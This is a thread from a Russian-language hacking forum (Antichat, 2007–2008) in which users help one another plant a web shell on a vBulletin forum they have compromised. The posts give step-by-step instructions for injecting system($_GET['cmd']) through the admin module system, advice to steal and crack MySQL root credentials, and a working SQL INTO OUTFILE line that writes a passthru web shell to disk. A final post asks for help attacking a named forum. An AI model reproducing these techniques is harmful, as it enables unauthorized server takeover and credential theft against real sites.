ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 21.12.2007, 14:50
Аватар для heks
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

-rw-r--r--. да такие права но они выделины белым а не зееленым редактировать файлы нельзя
 
Ответить с цитированием

  #22  
Старый 21.12.2007, 14:53
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Твой кролик пишет - произнеси на англиском 1000 раз, тогда появится возможность и записи и чтения.
 
Ответить с цитированием

  #23  
Старый 21.12.2007, 14:57
Аватар для heks
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

флуд тут не нужен
 
Ответить с цитированием

  #24  
Старый 21.12.2007, 14:57
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

если у тебя есть доступ к бд пробуй залить файл через into outfile, если не получится, попробуй извлечь логин и пасс рута из mysql.user, разшифруешь, подключишься к бд и снова попробуешь через into outfile
 
Ответить с цитированием

  #25  
Старый 21.12.2007, 15:00
Аватар для heks
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

пробовал залить шел так
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

но ни чего не выходит смаилы тоже отдыхают у кого есть еще предложения
 
Ответить с цитированием

  #26  
Старый 21.12.2007, 15:05
Аватар для heks
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

Цитата:
Сообщение от Spyder  
если у тебя есть доступ к бд пробуй залить файл через into outfile, если не получится, попробуй извлечь логин и пасс рута из mysql.user, разшифруешь, подключишься к бд и снова попробуешь через into outfile
хоть кто то понял о чем я говорю какой запрос в базе надо выполнить что бы залить шел
 
Ответить с цитированием

  #27  
Старый 22.12.2007, 02:28
Аватар для chekist
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

select '<?php @passthru($_GET[cmd]); ?>' into outfile '/fullpatch/shell.php' from table
директория должна быть открыта на запись [-rwxrwxrwx]
from table иногда нужно иногда нет, table любая таблица

google на что, об этом не раз писали и видео много
 
Ответить с цитированием

  #28  
Старый 03.01.2008, 16:59
Аватар для Airbender
Airbender
Новичок
Регистрация: 02.01.2008
Сообщений: 1
Провел на форуме:
14859

Репутация: 0
По умолчанию

народ помгаите взломать форум http://www.avatar-forums.com/ мне срочно нужно его ломануть или хотяб посмотрите может найдёте какие дыры
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом LiTO.ru ZaCo Авторские статьи 5 16.10.2005 23:29



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ